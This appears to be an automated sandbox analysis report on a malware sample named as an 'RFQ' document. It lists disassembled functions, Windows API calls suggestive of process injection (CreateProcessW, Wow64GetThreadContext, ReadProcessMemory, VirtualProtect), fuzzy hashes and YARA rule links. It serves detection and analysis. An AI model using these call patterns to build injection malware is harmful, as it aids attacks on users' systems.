Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e563156e91e36691d5f4fcac2aaf6be647dac8c86d34431775506fe1d7328f76
Instruction ID: 208f182f3c9136cc863dec11eab3d0960db0a10b8073f2b3425ab1c058278d8f
Opcode Fuzzy Hash: e563156e91e36691d5f4fcac2aaf6be647dac8c86d34431775506fe1d7328f76
Instruction Fuzzy Hash: 8AF13A716083019FC714DF29C480A6ABBE5FF88318F54892EF8999B392D734E945CF86

Function 00B797E0 Relevance: 4.8, APIs: 3, Instructions: 307COMMON

Download Yara Rule

APIs

GetFileSize.KERNEL32(?,00B78FCC,?,00000001,?,00000002,?,?), ref: 00B798BE

Memory Dump Source

Source File: 00000000.00000002.1541018921.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: FileSize
String ID:
API String ID: 3433856609-0
Opcode ID: da3978c74705996be0a82a549c343441f22c9ee117fcb3519d3b4f12a33514e0
Instruction ID: fccb4e798841df6093e749e1f83c8cb8aab19b8711528e497605bf76aaa5bbcb
Opcode Fuzzy Hash: da3978c74705996be0a82a549c343441f22c9ee117fcb3519d3b4f12a33514e0
Instruction Fuzzy Hash: BA91436198D3819FDB3A4A38485D6757BE1EB63360F8CC5DAD1BE8A2F2DA548C04C353

Function 00B97DF0 Relevance: 4.6, APIs: 3, Instructions: 89COMMON

Download Yara Rule

APIs

GetComputerNameW.KERNEL32 ref: 00B97E0F

Memory Dump Source

Source File: 00000000.00000002.1541018921.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 632ce4338bef30bcc1330a43ca9ed7cd9d81802ee527a49d54b614b6524a940d
Instruction ID: bc6130a22fa806a1cce848278d2fcf5cb13a28e79526723ef492285ca7a893a3
Opcode Fuzzy Hash: 632ce4338bef30bcc1330a43ca9ed7cd9d81802ee527a49d54b614b6524a940d
Instruction Fuzzy Hash: 6A21F8F0AED3406BDE3567248C46FB93AF5EF62710F8844F9F588561E2DD646C088263

Function 0040434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00404370
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00404415
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00404432

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: 55e578eaf81f1082cb721cb8179a93cbba9ea3621e04278649df261dfa9eaab8
Instruction ID: 448a70bf35e4549ae47872dc9eb977fea889799f7ce089bf6dae1479d4278b9a
Opcode Fuzzy Hash: 55e578eaf81f1082cb721cb8179a93cbba9ea3621e04278649df261dfa9eaab8
Instruction Fuzzy Hash: 4E3184B05047019FD760DF24D884A9BBBF8FB98308F00093FEA9A92391D7746944CB5A

Function 0042571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00425733

Part of subcall function 0042A16B: __NMSG_WRITE.LIBCMT ref: 0042A192
Part of subcall function 0042A16B: __NMSG_WRITE.LIBCMT ref: 0042A19C

__NMSG_WRITE.LIBCMT ref: 0042573A

Part of subcall function 0042A1C8: GetModuleFileNameW.KERNEL32(00000000,004C33BA,00000104,00000000,00000001,00000000), ref: 0042A25A
Part of subcall function 0042A1C8: ___crtMessageBoxW.LIBCMT ref: 0042A308

Part of subcall function 0042309F: ___crtCorExitProcess.LIBCMT ref: 004230A5
Part of subcall function 0042309F: ExitProcess.KERNEL32 ref: 004230AE

Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28

RtlAllocateHeap.NTDLL(00BF0000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 173bc1eb0939af60788e3920f729a181213a4711687b08a62f5fb4dd74449d1b
Instruction ID: 12628286b9c33790f0bcaf27d243d0f78d5a939af01e39ac9af769d2403f214a
Opcode Fuzzy Hash: 173bc1eb0939af60788e3920f729a181213a4711687b08a62f5fb4dd74449d1b
Instruction Fuzzy Hash: 8101D235380B31DADA102B36BC42A2E67588BC2766FD0043FF9059A281DE7C9D01866D

Function 004698A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00469548,?,?,?,?,?,00000004), ref: 004698BB
SetFileTime.KERNEL32(00000000,?,00000000,?,?,00469548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 004698D1
CloseHandle.KERNEL32(00000000,?,00469548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004698D8

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: bd87c49bddbed0dd2230edd6d70eff61a4bb717c0cd42ce1b208173b53aacf55
Instruction ID: c759ec0fed9c3a555ac5ec6521767d99e991bc38b38178bd45d0c2782cb34c4e
Opcode Fuzzy Hash: bd87c49bddbed0dd2230edd6d70eff61a4bb717c0cd42ce1b208173b53aacf55
Instruction Fuzzy Hash: 6EE08632140214B7D7212B54EC0DFDE7B19EB06760F144535FF14A90E087B12925979C

Function 00468D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00468D1B

Part of subcall function 00422D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00429A24), ref: 00422D69
Part of subcall function 00422D55: GetLastError.KERNEL32(00000000,?,00429A24), ref: 00422D7B

_free.LIBCMT ref: 00468D2C
_free.LIBCMT ref: 00468D3E

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction ID: 6b151060fb8ed88ed9ffdc5938a612973e117ec8253147f08314cae1c0c73c84
Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction Fuzzy Hash: 10E0C2B170171253CB20A579BA40A8313DC4F4C3967440A0FB40DD7282DEACF842803C

Function 0040A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 0043FC01

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 54e70f6dbdc0f72c3666d2773d7bf126ba6680f6ba681bae959ad27e66740017
Instruction ID: c803bb07f2a617980fc862d1973d54e65b33ee20ceb4547c7cbfd92c67e19f3b
Opcode Fuzzy Hash: 54e70f6dbdc0f72c3666d2773d7bf126ba6680f6ba681bae959ad27e66740017
Instruction Fuzzy Hash: 8A225B70608301DFD724DF14C454A6AB7E1FF44308F15896EE98AAB3A2D739EC55CB8A

Function 00407A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00407AAB
_memmove.LIBCMT ref: 00407B16

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 0323a77de9f9f125283f9f3eac0b647bd9c1fd2c8af7472a6d701d539f1455ed
Instruction ID: 2724e85abdc1188f3097b0ceee28e317ee468c7dcaf0b9eeda237b3ec1003ef0
Opcode Fuzzy Hash: 0323a77de9f9f125283f9f3eac0b647bd9c1fd2c8af7472a6d701d539f1455ed
Instruction Fuzzy Hash: CB31C4B1B00506AFC704DF69D891E69B3A4FF48314715822AE519CB3D1EB38F911CB95

Function 004047D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00404834

Part of subcall function 0042336C: __lock.LIBCMT ref: 00423372
Part of subcall function 0042336C: DecodePointer.KERNEL32(00000001,?,00404849,00457C74), ref: 0042337E
Part of subcall function 0042336C: EncodePointer.KERNEL32(?,?,00404849,00457C74), ref: 00423389

Part of subcall function 004048FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00404915
Part of subcall function 004048FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040492A

Part of subcall function 00403B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B68
Part of subcall function 00403B3A: IsDebuggerPresent.KERNEL32 ref: 00403B7A
Part of subcall function 00403B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,004C52F8,004C52E0,?,?), ref: 00403BEB
Part of subcall function 00403B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00403C6F

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00404874

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: 13bbe0c74f5194e49c071aa5a0b14ab81aac5f2f5d26dabd82ae82306b4d1084
Instruction ID: 9525eea27cfe2a06ee6bb0b94f8a439f0fec78f72a1223afaaa4f4cc7b3f6ca0
Opcode Fuzzy Hash: 13bbe0c74f5194e49c071aa5a0b14ab81aac5f2f5d26dabd82ae82306b4d1084
Instruction Fuzzy Hash: 96118E729143019BC700EF69E80591EBBE8EB95754F10893FF440932B2DB749A49CB9E

Function 00B75A3B Relevance: 3.1, APIs: 2, Instructions: 51threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,00B755C0,?,00000000,00000000), ref: 00B75A51
RtlExitUserThread.NTDLL(00000000), ref: 00B75B11

Memory Dump Source

Source File: 00000000.00000002.1541018921.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Thread$CreateExitUser
String ID:
API String ID: 4108186749-0
Opcode ID: a73756e86c8a57502ce4f38aa298a38da60a6afeec5b86659caed9a79da44267
Instruction ID: 4e669462f694e8cc1f3b2d3bef18a22f61420b334b85a52d2bbfe8881f14d2c3
Opcode Fuzzy Hash: a73756e86c8a57502ce4f38aa298a38da60a6afeec5b86659caed9a79da44267
Instruction Fuzzy Hash: 54111C1050DBC14ED7338B28482576ABFE09F63720F5986DAD1E84E1E3C2D9490C93A3

Function 00420DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0042571C: __FF_MSGBANNER.LIBCMT ref: 00425733
Part of subcall function 0042571C: __NMSG_WRITE.LIBCMT ref: 0042573A
Part of subcall function 0042571C: RtlAllocateHeap.NTDLL(00BF0000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F

std::exception::exception.LIBCMT ref: 00420DEC
__CxxThrowException@8.LIBCMT ref: 00420E01

Part of subcall function 0042859B: RaiseException.KERNEL32(?,?,00000000,004B9E78,?,00000001,?,?,?,00420E06,00000000,004B9E78,00409E8C,00000001), ref: 004285F0

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: a1c4870ae67c25cf443983c81cfea13b426b6c380140abe28f3bf244e2cf3b27
Instruction ID: 7ce0db18d3e86308d2e94e4ef4c1f65fcbea9f9514d772724804ad69f7891851
Opcode Fuzzy Hash: a1c4870ae67c25cf443983c81cfea13b426b6c380140abe28f3bf244e2cf3b27
Instruction Fuzzy Hash: BAF0863560223976CB10BA95FD015DF7BE89F01315F90452FF90496282DFB89A8091DD

Function 004253A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28

__lock_file.LIBCMT ref: 004253EB

Part of subcall function 00426C11: __lock.LIBCMT ref: 00426C34

__fclose_nolock.LIBCMT ref: 004253F6

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 835793fb4b5a24fbea1eeed30733b59c67049ef9a82bceb899d9520eea3a16f0
Instruction ID: fafcd99f2ade88ab86af259f2ce8aa17897398df1327fb2dd29172a4384519b5
Opcode Fuzzy Hash: 835793fb4b5a24fbea1eeed30733b59c67049ef9a82bceb899d9520eea3a16f0
Instruction Fuzzy Hash: 56F09C71B026249AD710BF66780579D66E06F41378FA1914FE814E71C1CFBC49419B5E

Function 00B75D20 Relevance: 2.5, APIs: 2, Instructions: 38COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00B75D6D

Memory Dump Source

Source File: 00000000.00000002.1541018921.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: e5474385944eaf411f401b02cb83e95e553a9b73f6dfd76a841b0f1a69654c67
Instruction ID: 52d795665323ba551728d655ec6f1cc4215b4d5cddade3281fa7d3e5abafc4a6
Opcode Fuzzy Hash: e5474385944eaf411f401b02cb83e95e553a9b73f6dfd76a841b0f1a69654c67
Instruction Fuzzy Hash: C6F05461E04F44EADA7E13A8ED5EF712AD0E712768F0DC1F9A27E6A0B28AD55C05C502

Function 00E7F61D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(?,00000000), ref: 00E7FDDB
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E7FE71
ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00E7FE93

Memory Dump Source

Source File: 00000000.00000002.1541781702.0000000000E7E000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E7E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e7e000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
Instruction ID: 3b688b014610990404be1af01541af4c9cb4192d80cf7eb5d748b75410b97645
Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
Instruction Fuzzy Hash: C612CF24E14658C6EB24DF64D8507DEB232EF68300F10A0E9910DEB7A5E77A4F85CF5A

Function 00B75F10 Relevance: 1.7, APIs: 1, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1541018921.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ad92c75d5b58e26a038aa2b40548f7337b234e1f040ce9e88db91f0e8bd2a94
Instruction ID: 610e4d70b18777f01344b80302360078e7a47224ac0db6c58752072ab3ad914a
Opcode Fuzzy Hash: 8ad92c75d5b58e26a038aa2b40548f7337b234e1f040ce9e88db91f0e8bd2a94
Instruction Fuzzy Hash: A971D53190CF804EC73647288898675BBE1EB62320F5DC6DAD0BD9F1E2D2F19E459792

Function 00B76490 Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1541018921.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb52a48e15a34e9a74e2031e247252cdeb986a8c7bfdc1cc883336b91a589da9
Instruction ID: 34bad5b9cf9f02f9b8cdeb08493a80c9e1c05787e9aaaa4c63d02035a25de6d3
Opcode Fuzzy Hash: eb52a48e15a34e9a74e2031e247252cdeb986a8c7bfdc1cc883336b91a589da9
Instruction Fuzzy Hash: 9531A56190CF408ECB358B28C488339BBF0EBA1750F49C5DAD0BD9A2E2D6758D08D752

Function 00420C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32 ref: 00420CB7

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 57d61025d726f571206bde1542701663147cad70cf876be0f0a1b4f50b8a7032
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 9031E7B0B001159BC71CDF0AE484A6AF7E5FB49300BA48696E40ACB356D635EDC1DB89

Function 0043FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0043FCB7

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 3d1cb9615f3ea5f5f5e6361dd344e1a47d9da12f05ea6428eae25d07ae27aef1
Instruction ID: 88ec2210b97eaeb66bd16e67604d6e353b3070822350be419431805434595ad1
Opcode Fuzzy Hash: 3d1cb9615f3ea5f5f5e6361dd344e1a47d9da12f05ea6428eae25d07ae27aef1
Instruction Fuzzy Hash: 24414C746083419FDB14DF14C444B1ABBE1BF45318F0988ADE8999B362C739EC45CF4A

Function 00407B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00407BB3

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
